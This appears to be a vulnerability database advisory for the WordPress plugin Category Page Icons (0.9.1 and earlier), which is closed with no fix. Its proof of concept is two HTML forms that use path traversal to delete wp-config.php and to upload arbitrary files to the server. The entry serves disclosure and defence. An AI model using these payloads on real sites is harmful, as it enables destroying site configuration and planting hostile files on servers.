Category Page Icons <= 0.9.1 - Arbitrary File Upload/Deletion via Path Traversal

Description

Version 0.9.2 added a check that blocks direct access to the affected file; however, the path traversal itself was not fixed.

The plugin has been closed in the plugin repository.

Proof of Concept
<form action="https://example.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="POST">
<input type="hidden" name="ajax_action" value="delete-image">
<input type="text" name="file_name_dir" value="../../../../">
<input type="text" name="file_name_org" value="wp-config.php">
<input type="submit" value="Delete it">
</form>

<form action="https://example.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="POST" enctype="multipart/form-data">
Choose File to upload : <input type="file" name="wpdev-async-upload"><br />
Directory : <input type="text" name="dir_icons" value="../../../../"><br />
<input type="submit" value="Upload">
</form>

Affects Plugin

No known fix - plugin closed

References

URL https://www.exploit-database.net/?id=22413

Classification

Type MULTI

Miscellaneous

Views 763
Verified No
WPVDB ID 10129

Timeline

Publicly Published 2014-09-29 (almost 6 years ago)
Added 2020-03-13 (4 months ago)
Last Updated 2020-03-14 (4 months ago)
